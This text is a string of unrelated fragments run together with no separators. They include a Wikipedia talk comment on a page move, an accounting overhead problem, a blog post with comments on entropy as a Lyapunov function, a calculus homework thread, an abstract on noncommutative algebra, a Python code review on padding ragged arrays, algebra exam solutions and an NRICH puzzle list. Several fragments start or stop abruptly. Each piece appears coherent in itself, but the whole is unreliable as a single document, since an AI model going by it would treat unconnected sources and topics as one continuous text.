But IMHO you shouldn't have moved in the first place; you should have created a new article to move the content. The edit history belongs with the bio, not with the article about the poisoning, and there's now no easy and clean way to get things back to where they should be. --Trovatore 06:51, 4 December 2006 (UTC) Actually it now seems to be back where it should be. And by the histories, this happened hours ago, whereas it didn't seem to be true when I checked half an hour ago. I really don't understand quite what has happened here. --Trovatore 07:10, 4 December 2006 (UTC)
# Westan Corporation uses a predetermined overhead rate of $23.10

Westan Corporation uses a predetermined overhead rate of $23.10 per direct labor-hour. This predetermined rate was based on 12,000 estimated direct labor-hours and $277,200 of estimated total manufacturing overhead. The company incurred actual total manufacturing overhead costs of $266,000 and 12,600 total direct labor-hours during the period. Required: Determine the amount of manufacturing overhead that would have been applied to units of product during the period.

Gaurav D: The amount of manufacturing overhead that would have been applied to units of product during the period should be computed by multiplying the predetermined overhead rate by the number of direct labor-hours worked during the period....
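With the figures given in the problem, the rule quoted in the answer works out as follows (the over-applied comparison at the end is an extra observation, not part of what the question asks):

$\text{Applied overhead} = \$23.10 \text{ per DLH} \times 12{,}600 \text{ actual DLH} = \$291{,}060$

As a check, the predetermined rate itself is $\$277{,}200 / 12{,}000 = \$23.10$ per direct labor-hour. Compared with the $266,000 of actual overhead, applied overhead would exceed actual overhead by $291,060 − $266,000 = $25,060, i.e. overhead would be over-applied for the period.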
# Blog articles on stochastic methods

I've been soliciting blog articles, and they're starting to come in! Here are some on stochastic methods which we can expect to see soon: I should be editing the first of these today! In fact I should be doing it right now! It will be the next article on the blog, that's for sure. Taken together, these two should give a nice introduction to new work on evolutionary game theory with a strong emphasis on relative entropy and information geometry. One thing I want to explain clearly is how relative entropy can serve as a Lyapunov function for evolutionary games. This includes answering "what the @#!% is a Lyapunov function and why the &#%@ should I care???" The overall goal is applying robust concepts like entropy to better understand the behavior of biological and ecological systems. This post will explain a very interesting entropy-related Lyapunov function for certain chemical reaction networks. It's almost done, but it needs some editing and it still needs pictures. Again, the overall goal is to apply entropy to better understand living systems. And since some evolutionary games can be reinterpreted as chemical reaction networks, this post should be closely related to what Marc is doing! But there's some mental work to make the connection — for me, at least. It should be really cool when it all fits together! Very roughly, this is about a method for determining which economic scenarios are more likely. The likely scenarios get fed into things like the IPCC climate models, so this is important. I met Vanessa Schweizer at that workshop on What is climate change and what to do about it?, and she suggested that I could help her and Alastair and Matteo Smerlak work on this topic. That sounded really interesting, so I solicited some blog articles to prime the pump! Since this stuff is stochastic, it may be related to the other posts above. I don't know how related it is. Matteo should have some opinions on that.

## Comments

1. > This includes answering “what the @#!% is a Lyapunov function and why the &#%@ should I care???”

I'm glad that Lyapunov functions are quite central to Marc's and Manoj's blogs, since they were the only thing I did sort of understand beforehand! I think I'd start an explanation with a ball rolling around in a bowl.
Add some syrup to stop the ball having enough kinetic energy to worry about. Then the gravitational potential (or just the height) of the ball can serve as a Lyapunov function. Without the syrup, things become more complicated, but at least you expect the potential plus kinetic energy of the ball to monotonically decrease. Without the bowl, who knows where the ball might go. It seems quite intuitive that:

1. Lyapunov functions are great things if you can get them because they give a guide to the global properties of the system.
2. You don't expect to find them in general, and even when one exists, it may be difficult to find.
3. Free energy or entropy, or analogues, are a good place to start looking.

2. (edited December 2013) Graham: you might check out my edited version of Marc Harper's post on relative entropy in evolutionary dynamics. You'll be glad to know that even before reading your comment, I greatly expanded the discussion of Lyapunov functions and started talking about balls rolling down hills. I did not talk about the need for syrup, nor did I mention that free energy or entropy are good places to start looking for such functions. Before, in parts 9-13 of the information geometry series, I explained how relative entropy being a Lyapunov function for evolutionary dynamics is connected to the 2nd law of thermodynamics. However, it's probably worth another mention! The issue of needing lots of friction to get our "rolling ball" intuition to apply to first-order differential equations is extremely important, but I'm not sure this blog article is the place for it.
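As a minimal numerical illustration of the idea being discussed (not code from the blog posts themselves): replicator dynamics for a Hawk-Dove game whose mixed equilibrium $x^* = (1/2, 1/2)$ is an ESS, with the relative entropy $D(x^* \| x)$ printed along the trajectory so one can watch it decrease. The payoff matrix and starting point are arbitrary choices made for the sketch.

```python
# Illustrative sketch only: relative entropy D(x* || x) decreasing along
# replicator dynamics for a Hawk-Dove game with mixed ESS x* = (1/2, 1/2).
import numpy as np

A = np.array([[-1.0, 2.0],     # Hawk vs (Hawk, Dove)
              [ 0.0, 1.0]])    # Dove vs (Hawk, Dove)
x_star = np.array([0.5, 0.5])  # mixed ESS of this game

def relative_entropy(p, q):
    """Kullback-Leibler divergence D(p || q) for strictly positive q."""
    return float(np.sum(p * np.log(p / q)))

x = np.array([0.9, 0.1])       # initial population state, far from x*
dt = 0.01
for step in range(2001):
    if step % 500 == 0:
        print(f"t = {step * dt:5.1f}  x = {np.round(x, 4)}  "
              f"D(x*||x) = {relative_entropy(x_star, x):.5f}")
    fitness = A @ x                            # payoff of each pure strategy
    x = x + dt * x * (fitness - x @ fitness)   # Euler step of the replicator equation
    x = x / x.sum()                            # renormalize against numerical drift
```

The printed values of $D(x^* \| x)$ fall monotonically toward zero, which is exactly the ball-in-a-bowl-of-syrup picture: the replicator flow is first order, so the Lyapunov function decreases along every trajectory instead of oscillating.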
# Derivatives Calculus Help

1. Apr 16, 2013
### Dustobusto
1. The problem statement, all variables and given/known data
Let f(x) = 2x^2 - 3x - 5. Show that the slope of the secant line through (2, f(2)) and (2+h, f(2+h)) is 2h + 5. Then use this formula to compute the slope of: (a) The secant line through (2, f(2)) and (3, f(3)) (b) The tangent line at x = 2 (by taking a limit)
2. Relevant equations: too many to count
3. The attempt at a solution
Ok, so the first part I can do. I do f(x) - f(a) over x - a. In this case, for the numerator you plug 2+h into all of the x's in the f(x) formula given, and 2 into a, and then the denominator is x - a or in this case, (2+h) - 2, which = h. Factor it out, simplify, you get 2h + 5. My question is, once I have this, is part (a) asking me to solve using 2h + 5? I'm not sure how I would go about this. And part b, if it's also asking me to solve using 2h + 5, then my GUESS would be: the limit of (2h + 5) as x approaches 2 = 9, because you would just plug 2 into h. Edit: Okay so.. P = (a, f(a)) and Q = (x, f(x)), so then for (2, f(2)) and (3, f(3)), a would be 2 and x would be 3. In the book it says that h = x - a. So if we plug that into 2h + 5 we get 2(3-2) + 5 and that = 7. Likewise, if we just plug 3 and 2 into the formula f(x) - f(a) over x - a, we get 7/1. So that answer must be right. I think I'm on to something here... Last edited: Apr 16, 2013

2. Apr 16, 2013
### rock.freak667
f'(a) is defined as the limit as h→0 of [f(a+h) - f(a)]/h. So far you have calculated [f(2+h) - f(2)]/h = 2h + 5, so as h→0, what does 2h + 5 go to?

3. Apr 16, 2013
### Dustobusto
I see. So f'(a) = lim of 2h+5 as h → 0 would be 5. i.e. the derivative is 5. right?

4. Apr 16, 2013
### Dick
Yes, the derivative is 5.
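For completeness, the algebra behind the secant-slope formula discussed in the thread can be written out directly (this is just the standard difference-quotient computation):

$\begin{eqnarray}
f(2+h) &=& 2(2+h)^2 - 3(2+h) - 5 = 2h^2 + 5h - 3 \\
f(2) &=& 2(2)^2 - 3(2) - 5 = -3 \\
\frac{f(2+h) - f(2)}{h} &=& \frac{2h^2 + 5h}{h} = 2h + 5
\end{eqnarray}$

So the secant through $(2, f(2))$ and $(3, f(3))$ corresponds to $h = 1$ and has slope $2(1) + 5 = 7$, while the tangent slope at $x = 2$ is $\lim_{h \to 0} (2h + 5) = 5$.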
## Banach Center Publications

2011 | 93 | 1 | 69-82

### Geometry of noncommutative algebras

Abstract (EN): There have been several attempts to generalize commutative algebraic geometry to the noncommutative situation. Localizations with good properties rarely exist for noncommutative algebras, and this makes a direct generalization difficult. Our point of view, following Laudal, is that the points of the noncommutative geometry should be represented as simple modules, and that noncommutative deformations should be used to obtain a suitable localization in the noncommutative situation. Let A be an algebra over an algebraically closed field k. If A is commutative and finitely generated over k, then any simple A-module has the form $M = A/\mathfrak{m}$, the residue field, for a maximal ideal $\mathfrak{m} \subseteq A$, and the commutative deformation functor $\mathsf{Def}_M$ has formal moduli $\hat{A}_{\mathfrak{m}}$. In the general case, we may replace the A-module $A/\mathfrak{m}$ with the simple A-module M, and use the formal moduli of the commutative deformation functor $\mathsf{Def}_M$ as a replacement for the complete local ring $\hat{A}_{\mathfrak{m}}$. We recall the construction of the commutative scheme simp(A), with points in bijective correspondence with the simple A-modules of finite dimension over k, and with complete local ring at a point M isomorphic to the formal moduli of the corresponding simple module M. The scheme simp(A) has good properties, in particular when there are no infinitesimal relations between different points, i.e. when $\mathrm{Ext}^1_A(M,M') = 0$ for all pairs of non-isomorphic simple A-modules M, M'. It does not, however, characterize A. We use noncommutative deformation theory to define localizations, in general. We consider the quantum plane, given by A = k⟨x,y⟩/(xy - qyx), as an example. This is an Artin-Schelter algebra of dimension two.

Author affiliations:
• BI Norwegian Business School, N-0442 Oslo, Norway
• Buskerud University College, P.O. Box 235, N-3603 Kongsberg, Norway
# Pad a ragged multidimensional array to rectangular shape

For some machine learning purpose, I need to work with sequences with different lengths. To be able to process those sequences efficiently, I need to process them in batches of size size_batch. A batch typically has 4 dimensions and I want to convert it to a numpy ndarray with 4 dimensions. For each sequence, I need to pad with some defined pad_value such that each element has the same size: the maximal size. For example, with 3 dimensional input:

```python
[[[0, 1, 2], [3], [4, 5]], [[6]], [[7, 8], [9]]]
```

the desired output for pad_value -1 is:

```python
[[[0, 1, 2], [3, -1, -1], [4, 5, -1]],
 [[6, -1, -1], [-1, -1, -1], [-1, -1, -1]],
 [[7, 8, -1], [9, -1, -1], [-1, -1, -1]]]
```

which has shape (3, 3, 3). For this problem, one can assume that there are no empty lists in the input. Here is the solution I came up with:

```python
import numpy as np
import itertools as it
from typing import List


def pad(array: List, pad_value, dtype=np.int64):  # signature inferred from the docstring; the original "def" line is missing
    """
    Pads a nested list to the max shape and fill empty values with pad_value
    :param array: high dimensional list to be padded
    :param dtype: type of the output
    :return: padded copy of param array
    """
    # Get max shape
    def get_max_shape(arr, ax=0, dims=[]):
        try:
            if ax >= len(dims):
                dims.append(len(arr))
            else:
                dims[ax] = max(dims[ax], len(arr))
            for i in arr:
                get_max_shape(i, ax + 1, dims)
        except TypeError:  # On non iterable / lengthless objects (leaves)
            pass
        return dims

    dims = get_max_shape(array)

    def get_item(arr, idx):
        while True:
            i, *idx = idx
            arr = arr[i]
            if not idx:
                break
        return arr

    r = np.zeros(dims, dtype=dtype) + pad_value
    for idx in it.product(*map(range, dims)):
        # idx runs through all possible tuples of indices that might
        # contain a value in array
        try:
            r[idx] = get_item(array, idx)
        except IndexError:
            continue
    return r
```

It does not feel really pythonic but does the job. Is there any better way to do it I should know? I think I might be able to improve its speed by doing smart breaks in the last loop but I haven't dug much yet.

• Maybe you should have more descriptive variable names... – Justin Jun 20 at 15:09
• Stackoverflow has lots of array pad questions, and clever answers. Most common case is padding 1d lists to form a 2d array. itertools.zip_longest is a handy tool for that, though not the fastest. – hpaulj Jun 20 at 18:07

# nested methods

Why do you nest the get_max_shape etcetera in the pad? There is no need to do this.

# get_max_shape

Here you use recursion and a global variable. A simpler way would be to have a generator that recursively runs through the array, and yields the level and length of that part, and then another function to aggregate these results. That way you can avoid passing dims around:

```python
def get_dimensions(array, level=0):
    yield level, len(array)
    try:
        for row in array:
            yield from get_dimensions(row, level + 1)
    except TypeError:  # not an iterable
        pass
```

```python
[(0, 3), (1, 3), (2, 3), (2, 1), (2, 2), (1, 1), (2, 1), (1, 2), (2, 2), (2, 1)]
```

The aggregation can be very simple using collections.defaultdict:

```python
from collections import defaultdict  # import needed for this snippet

def get_max_shape(array):
    dimensions = defaultdict(int)
    for level, length in get_dimensions(array):
        dimensions[level] = max(dimensions[level], length)
    return [value for _, value in sorted(dimensions.items())]
```

```python
[3, 3, 3]
```

# creating the result

Instead of r = np.zeros(dims, dtype=dtype) + pad_value you can use np.full. You iterate over all possible indices, and check whether it is present in the original array. Depending on how "full" the original array is, this can save some time.
It also allows you to do this without your custom get_item method to get the element at the nested index:

```python
def iterate_nested_array(array, index=()):
    try:
        for idx, row in enumerate(array):
            yield from iterate_nested_array(row, (*index, idx))
    except TypeError:  # final level
        for idx, item in enumerate(array):
            yield (*index, idx), item
```

```python
[((0, 0, 0), 0), ((0, 0, 1), 1), ((0, 0, 2), 2), ((0, 1, 0), 3), ((0, 2, 0), 4), ((0, 2, 1), 5), ((1, 0, 0), 6), ((2, 0, 0), 7), ((2, 0, 1), 8), ((2, 1, 0), 9)]
```

## slice

An even better way, as suggested by @hpaulj, uses slices:

```python
def iterate_nested_array(array, index=()):
    try:
        for idx, row in enumerate(array):
            yield from iterate_nested_array(row, (*index, idx))
    except TypeError:  # final level
        yield (*index, slice(len(array))), array
```

```python
[((0, 0, slice(None, 3, None)), [0, 1, 2]), ((0, 1, slice(None, 1, None)), [3]), ((0, 2, slice(None, 2, None)), [4, 5]), ((1, 0, slice(None, 1, None)), [6]), ((2, 0, slice(None, 2, None)), [7, 8]), ((2, 1, slice(None, 1, None)), [9])]
```

```python
def pad(array, fill_value):
    dimensions = get_max_shape(array)
    result = np.full(dimensions, fill_value)
    for index, value in iterate_nested_array(array):
        result[index] = value
    return result
```

```python
array([[[ 0,  1,  2],
        [ 3, -1, -1],
        [ 4,  5, -1]],

       [[ 6, -1, -1],
        [-1, -1, -1],
        [-1, -1, -1]],

       [[ 7,  8, -1],
        [ 9, -1, -1],
        [-1, -1, -1]]])
```

• I really should use yield more often! It's a nice trick to save memory and enhance efficiency. – pLOPeGG Jun 20 at 15:10
• You could save some time by assigning a whole slice on the last dimension: result[i,j,:len(row)] = row, but that requires 2 hard coded levels of looping, rather than your flexible recursive iteration. – hpaulj Jun 24 at 3:38
• Brilliant suggestion. You don't need a second for-loop for that, just a small adjustment to iterate_nested_array. Dynamic typing can lead to such simple code. – Maarten Fabré Jun 24 at 6:33
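As a quick sanity check of the reviewed version (a snippet added for illustration, not part of the original thread), pasting the answer's get_dimensions, get_max_shape, iterate_nested_array and pad into one module and running them on the question's example should reproduce the desired output:

```python
# Assumes the four functions from the answer above are defined in this module.
import numpy as np

ragged = [[[0, 1, 2], [3], [4, 5]],
          [[6]],
          [[7, 8], [9]]]

padded = pad(ragged, fill_value=-1)
print(padded.shape)   # (3, 3, 3)
print(padded[0])      # [[ 0  1  2]
                      #  [ 3 -1 -1]
                      #  [ 4  5 -1]]
```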
Spring 1994 Algebra Prelim Solutions

1. Suppose $G$ is a simple group with exactly three elements of order two. Consider the conjugation action of $G$ on the three elements of order two: specifically if $g \in G$ and $x$ is an element of order two, then we define $g \cdot x = gxg^{-1}$. This action yields a homomorphism $\theta \colon G \to S_3$. Suppose $\ker\theta = G$. Then $gxg^{-1} = x$ for all $g \in G$ and for all elements $x$ of order two. Thus if $x$ is an element of order two, we see that $x$ is in the center of $G$ and hence $G$ is not simple. On the other hand if $\ker\theta \ne G$, then since $G$ is simple we must have $\ker\theta = 1$ and it follows that $G$ is isomorphic to a subgroup of $S_3$. The only subgroup of $S_3$ which has exactly three elements of order two is $S_3$ itself. But $S_3$ is not simple (because $A_3$ is a nontrivial normal subgroup), hence $G$ is not simple and the result is proven.

2. Let $F$ denote the free group on generators $x, y$, and define a homomorphism $f \colon F \to S_3$ by $f(x) = (123)$ and $f(y) = (12)$. Since $f(x^6) = (123)^6 = e$, $f(y^4) = (12)^4 = e$, and $f(yxy^{-1}) = (213) = f(x)^{-1}$, we see that $f$ induces a homomorphism from $G$ to $S_3$. This homomorphism is onto because its image contains $f(x) = (123)$ and $f(y) = (12)$, and the elements $(123)$, $(12)$ generate $S_3$. Thus $G$ has a homomorphic image isomorphic to $S_3$. We prove that $G$ is not isomorphic to $S_3$ by showing it has an element whose order is a multiple of 4 or $\infty$, which will establish the result because the orders of elements in $S_3$ are 1, 2 and 3. We shall use bars to denote the image of a number in $\mathbb{Z}/4\mathbb{Z}$. Thus $\bar{0}$ is the identity of $\mathbb{Z}/4\mathbb{Z}$ under the operation of addition. Define $h \colon F \to \mathbb{Z}/4\mathbb{Z}$ by $h(x) = \bar{2}$ and $h(y) = \bar{1}$. Since $h(x^6) = 6 \cdot \bar{2} = \bar{0}$, $h(y^4) = 4 \cdot \bar{1} = \bar{0}$, and $h(yxy^{-1}) = \bar{1} + \bar{2} - \bar{1} = \bar{2} = h(x^{-1})$, we see that $h$ induces a homomorphism from $G$ to $\mathbb{Z}/4\mathbb{Z}$, which has $\bar{1}$ in its image. Since $\bar{1}$ has order 4, it follows that $G$ has an element whose order is either a multiple of 4 or infinity. This completes the proof.

3. (i) Since $R$ is not a field, we may choose $0 \ne s \in R$ such that $s$ is not a unit, equivalently $sR \ne R$. Define $f \colon R \to R$ by $f(r) = sr$. Then $f$ is an $R$-module homomorphism which is injective, because $R$ is a PID and $s \ne 0$, and is not onto because $s$ is not a unit. This proves that $R$ is isomorphic to the proper submodule $sR$ of $R$.

(ii) Using the fundamental structure theorem for finitely generated modules over a PID, we may write $M$ as a direct sum of cyclic $R$-modules. Since $M$ is not a torsion module, at least one of these summands must be $R$; in other words we may write $M \cong R \oplus N$ for some $R$-submodule $N$ of $M$. Then $M \cong sR \oplus N$ and since $sR \oplus N$ is a proper submodule of $R \oplus N$, we have proven that $M$ is isomorphic to a proper submodule of itself.

4. (i) We will write mappings on the left. Let $\iota \colon B \to B \oplus C$, $\kappa \colon C \to B \oplus C$ denote the natural injections (so $\iota b = (b, 0)$), and let $\pi \colon B \oplus C \to B$, $\rho \colon B \oplus C \to C$ denote the natural epimorphisms (so $\pi(b, c) = b$). Define $\Phi \colon \mathrm{Hom}_R(A, B \oplus C) \to \mathrm{Hom}_R(A, B) \oplus \mathrm{Hom}_R(A, C)$ by $\Phi(f) = (\pi f, \rho f)$, and $\Psi \colon \mathrm{Hom}_R(A, B) \oplus \mathrm{Hom}_R(A, C) \to \mathrm{Hom}_R(A, B \oplus C)$ by $\Psi(f, g) = \iota f + \kappa g$. It is easily checked that $\Phi$ and $\Psi$ are $R$-module homomorphisms, so it will suffice to prove that $\Phi\Psi$ and $\Psi\Phi$ are the identity maps. We have $\Phi\Psi(f, g) = \Phi(\iota f + \kappa g) = (\pi(\iota f + \kappa g), \rho(\iota f + \kappa g)) = (f, g)$ because $\pi\kappa$, $\rho\iota$ are the zero maps, and $\pi\iota$, $\rho\kappa$ are the identity maps. Therefore $\Phi\Psi$ is the identity map. Also $\Psi\Phi(h) = \Psi(\pi h, \rho h) = \iota\pi h + \kappa\rho h = (\iota\pi + \kappa\rho)h = h$ because $\iota\pi + \kappa\rho$ is the identity map. Thus $\Psi\Phi$ is the identity map and (i) is proven.

(ii) Write $\mathrm{Hom}_R(A, A) = X$. If $\mathrm{Hom}_R(A, A \oplus A) \cong \mathbb{Z}$, then by the first part we would have $X \oplus X \cong \mathbb{Z}$. Thus $X \ne 0$, and we see that $\mathbb{Z}$ is the direct sum of two nonzero groups. This is not possible and the result follows.

5. (i) Let $I$ be an ideal of $S^{-1}R$. We need to prove that $I$ is finitely generated. Let $J = \{r \in R \mid r/1 \in I\}$ (where we view $S^{-1}R$ as elements of the form $r/s$ where $r \in R$ and $s \in S$). Then $J$ is an ideal of $R$ and since $R$ is Noetherian, there exist elements $x_1, \ldots, x_n$ which generate $J$ as an ideal, which means $J = x_1R + \cdots + x_nR$. We claim that $I$ is generated by $\{x_1/1, \ldots, x_n/1\}$. Indeed if $r/s \in I$, then $r = r_1x_1 + \cdots + r_nx_n$ for some $r_i \in R$, and hence $r/s = (r_1/s)x_1 + \cdots + (r_n/s)x_n$. This proves (i).

(ii) Let $S$ be the multiplicative subset $\{1, X, X^2, \ldots\}$. Then every element of $S$ is invertible in $R[[X, X^{-1}]]$ and hence the identity map $R[[X]] \to R[[X]]$ extends to a homomorphism $S^{-1}R[[X]] \to R[[X, X^{-1}]]$. It is easily checked that this map is an isomorphism. Since $R[[X]]$ is Noetherian, it follows from (i) that $S^{-1}R[[X]]$ is Noetherian and hence $R[[X, X^{-1}]]$ is Noetherian as required.

6. (i) Set $Y = X - 1$. Then
$X^4 + X^3 + X^2 + X + 1 = (X^5 - 1)/(X - 1) = ((Y + 1)^5 - 1)/Y = (Y^5 + 5Y^4 + 10Y^3 + 10Y^2 + 5Y)/Y = Y^4 + 5Y^3 + 10Y^2 + 10Y + 5.$
Applying Eisenstein's criterion for the prime 5, we see that $Y^4 + 5Y^3 + 10Y^2 + 10Y + 5$ is irreducible in $\mathbb{Q}[Y]$. Since $Y \mapsto Y + 1$ induces an automorphism of $\mathbb{Q}[Y]$, we deduce that $X^4 + X^3 + X^2 + X + 1$ is irreducible.

(ii) Let $c(X)$ denote the characteristic polynomial of $A$, and let $m(X)$ denote the minimum polynomial of $A$. Since $A^5 = I$, we see that $m(X)$ divides $X^5 - 1$, and since 1 is not an eigenvalue of $A$, we see that $X - 1$ does not divide $m(X)$. Therefore $m(X)$ divides $X^4 + X^3 + X^2 + X + 1$ and using (i), we deduce that the only irreducible factor of $m(X)$ is $X^4 + X^3 + X^2 + X + 1$. It follows that the only irreducible factor of $c(X)$ is $X^4 + X^3 + X^2 + X + 1$, which shows that the degree of $c(X)$ is a multiple of 4. This completes the proof, because $n$ is the degree of $c(X)$.

Peter Linnell 1998-07-09
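The expansion in 6(i) is easy to verify mechanically. Here is a small symbolic check (an illustration added alongside the solutions, using sympy; it is not part of the original exam write-up):

```python
from sympy import symbols, expand, factor, Poly

X, Y = symbols('X Y')
p = X**4 + X**3 + X**2 + X + 1

# Substitute X = Y + 1 and expand, as in the solution to 6(i).
q = expand(p.subs(X, Y + 1))
print(q)                        # Y**4 + 5*Y**3 + 10*Y**2 + 10*Y + 5
print(Poly(q, Y).all_coeffs())  # [1, 5, 10, 10, 5] -- Eisenstein applies at the prime 5
print(factor(p))                # X**4 + X**3 + X**2 + X + 1, i.e. already irreducible over Q
```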
# Search by Topic #### Resources tagged with Working systematically similar to Terminology: Filter by: Content type: Stage: Challenge level: ### There are 131 results Broad Topics > Using, Applying and Reasoning about Mathematics > Working systematically ### Sticky Numbers ##### Stage: 3 Challenge Level: Can you arrange the numbers 1 to 17 in a row so that each adjacent pair adds up to a square number? ### Plum Tree ##### Stage: 4 and 5 Challenge Level: Label this plum tree graph to make it totally magic! ### Consecutive Numbers ##### Stage: 2 and 3 Challenge Level: An investigation involving adding and subtracting sets of consecutive numbers. Lots to find out, lots to explore. ### 9 Weights ##### Stage: 3 Challenge Level: You have been given nine weights, one of which is slightly heavier than the rest. Can you work out which weight is heavier in just two weighings of the balance? ### Maths Trails ##### Stage: 2 and 3 The NRICH team are always looking for new ways to engage teachers and pupils in problem solving. Here we explain the thinking behind maths trails. ### You Owe Me Five Farthings, Say the Bells of St Martin's ##### Stage: 3 Challenge Level: Use the interactivity to listen to the bells ringing a pattern. Now it's your turn! Play one of the bells yourself. How do you know when it is your turn to ring? ### Product Sudoku ##### Stage: 3, 4 and 5 Challenge Level: The clues for this Sudoku are the product of the numbers in adjacent squares. ### Special Numbers ##### Stage: 3 Challenge Level: My two digit number is special because adding the sum of its digits to the product of its digits gives me my original number. What could my number be? ### Magic W ##### Stage: 4 Challenge Level: Find all the ways of placing the numbers 1 to 9 on a W shape, with 3 numbers on each leg, so that each set of 3 numbers has the same total. ### Tea Cups ##### Stage: 2 and 3 Challenge Level: Place the 16 different combinations of cup/saucer in this 4 by 4 arrangement so that no row or column contains more than one cup or saucer of the same colour. ### Weights ##### Stage: 3 Challenge Level: Different combinations of the weights available allow you to make different totals. Which totals can you make? ### LOGO Challenge - Triangles-squares-stars ##### Stage: 3 and 4 Challenge Level: Can you recreate these designs? What are the basic units? What movement is required between each unit? Some elegant use of procedures will help - variables not essential. ### Problem Solving, Using and Applying and Functional Mathematics ##### Stage: 1, 2, 3, 4 and 5 Challenge Level: Problem solving is at the heart of the NRICH site. All the problems give learners opportunities to learn, develop or use mathematical concepts and skills. Read here for more information. ### Triangles to Tetrahedra ##### Stage: 3 Challenge Level: Starting with four different triangles, imagine you have an unlimited number of each type. How many different tetrahedra can you make? Convince us you have found them all. ### More Magic Potting Sheds ##### Stage: 3 Challenge Level: The number of plants in Mr McGregor's magic potting shed increases overnight. He'd like to put the same number of plants in each of his gardens, planting one garden each day. How can he do it? ### Oranges and Lemons, Say the Bells of St Clement's ##### Stage: 3 Challenge Level: Bellringers have a special way to write down the patterns they ring. Learn about these patterns and draw some of your own. 
### LOGO Challenge - Pentagram Pylons ##### Stage: 3, 4 and 5 Challenge Level: Pentagram Pylons - can you elegantly recreate them? Or, the European flag in LOGO - what poses the greater problem? ### LOGO Challenge - Following On ##### Stage: 3, 4 and 5 Challenge Level: Remember that you want someone following behind you to see where you went. Can yo work out how these patterns were created and recreate them? ##### Stage: 3, 4 and 5 Challenge Level: You need to find the values of the stars before you can apply normal Sudoku rules. ### Counting on Letters ##### Stage: 3 Challenge Level: The letters of the word ABACUS have been arranged in the shape of a triangle. How many different ways can you find to read the word ABACUS from this triangular pattern? ### LOGO Challenge - Sequences and Pentagrams ##### Stage: 3, 4 and 5 Challenge Level: Explore this how this program produces the sequences it does. What are you controlling when you change the values of the variables? ### Advent Calendar 2011 - Secondary ##### Stage: 3, 4 and 5 Challenge Level: Advent Calendar 2011 - a mathematical activity for each day during the run-up to Christmas. ### A Long Time at the Till ##### Stage: 4 and 5 Challenge Level: Try to solve this very difficult problem and then study our two suggested solutions. How would you use your knowledge to try to solve variants on the original problem? ### Where Can We Visit? ##### Stage: 3 Challenge Level: Charlie and Abi put a counter on 42. They wondered if they could visit all the other numbers on their 1-100 board, moving the counter using just these two operations: x2 and -5. What do you think? ### More Children and Plants ##### Stage: 2 and 3 Challenge Level: This challenge extends the Plants investigation so now four or more children are involved. ### More Plant Spaces ##### Stage: 2 and 3 Challenge Level: This challenging activity involves finding different ways to distribute fifteen items among four sets, when the sets must include three, four, five and six items. ### Building with Longer Rods ##### Stage: 2 and 3 Challenge Level: A challenging activity focusing on finding all possible ways of stacking rods. ### Crossing the Town Square ##### Stage: 2 and 3 Challenge Level: This tricky challenge asks you to find ways of going across rectangles, going through exactly ten squares. ### Making Maths: Double-sided Magic Square ##### Stage: 2 and 3 Challenge Level: Make your own double-sided magic square. But can you complete both sides once you've made the pieces? ### LCM Sudoku II ##### Stage: 3, 4 and 5 Challenge Level: You are given the Lowest Common Multiples of sets of digits. Find the digits and then solve the Sudoku. ### Difference Sudoku ##### Stage: 3 and 4 Challenge Level: Use the differences to find the solution to this Sudoku. ### LOGO Challenge - the Logic of LOGO ##### Stage: 3 and 4 Challenge Level: Just four procedures were used to produce a design. How was it done? Can you be systematic and elegant so that someone can follow your logic? ### Intersection Sudoku 1 ##### Stage: 3 and 4 Challenge Level: A Sudoku with a twist. ### Consecutive Negative Numbers ##### Stage: 3 Challenge Level: Do you notice anything about the solutions when you add and/or subtract consecutive negative numbers? ##### Stage: 3 and 4 Challenge Level: This is a variation of sudoku which contains a set of special clue-numbers. Each set of 4 small digits stands for the numbers in the four cells of the grid adjacent to this set. 
##### Stage: 3 and 4 Challenge Level: Four numbers on an intersection that need to be placed in the surrounding cells. That is all you need to know to solve this sudoku. ### Creating Cubes ##### Stage: 2 and 3 Challenge Level: Arrange 9 red cubes, 9 blue cubes and 9 yellow cubes into a large 3 by 3 cube. No row or column of cubes must contain two cubes of the same colour. ### Summing Consecutive Numbers ##### Stage: 3 Challenge Level: Many numbers can be expressed as the sum of two or more consecutive integers. For example, 15=7+8 and 10=1+2+3+4. Can you say which numbers can be expressed in this way? ### When Will You Pay Me? Say the Bells of Old Bailey ##### Stage: 3 Challenge Level: Use the interactivity to play two of the bells in a pattern. How do you know when it is your turn to ring, and how do you know which bell to ring? ### Equation Sudoku ##### Stage: 3, 4 and 5 Challenge Level: Solve the equations to identify the clue numbers in this Sudoku problem. ### Squares in Rectangles ##### Stage: 3 Challenge Level: A 2 by 3 rectangle contains 8 squares and a 3 by 4 rectangle contains 20 squares. What size rectangle(s) contain(s) exactly 100 squares? Can you find them all? ### Intersection Sudoku 2 ##### Stage: 3 and 4 Challenge Level: A Sudoku with a twist. ### The Great Weights Puzzle ##### Stage: 4 Challenge Level: You have twelve weights, one of which is different from the rest. Using just 3 weighings, can you identify which weight is the odd one out, and whether it is heavier or lighter than the rest? ### All-variables Sudoku ##### Stage: 3, 4 and 5 Challenge Level: The challenge is to find the values of the variables if you are to solve this Sudoku. ### Medal Muddle ##### Stage: 3 Challenge Level: Countries from across the world competed in a sports tournament. Can you devise an efficient strategy to work out the order in which they finished? ### Games Related to Nim ##### Stage: 1, 2, 3 and 4 This article for teachers describes several games, found on the site, all of which have a related structure that can be used to develop the skills of strategic planning. ### Colour Islands Sudoku ##### Stage: 3 Challenge Level: An extra constraint means this Sudoku requires you to think in diagonals as well as horizontal and vertical lines and boxes of nine. ### Multiplication Equation Sudoku ##### Stage: 4 and 5 Challenge Level: The puzzle can be solved by finding the values of the unknown digits (all indicated by asterisks) in the squares of the $9\times9$ grid. ### The Naked Pair in Sudoku ##### Stage: 2, 3 and 4 A particular technique for solving Sudoku puzzles, known as "naked pair", is explained in this easy-to-read article. ### Instant Insanity ##### Stage: 3, 4 and 5 Challenge Level: Given the nets of 4 cubes with the faces coloured in 4 colours, build a tower so that on each vertical wall no colour is repeated, that is all 4 colours appear.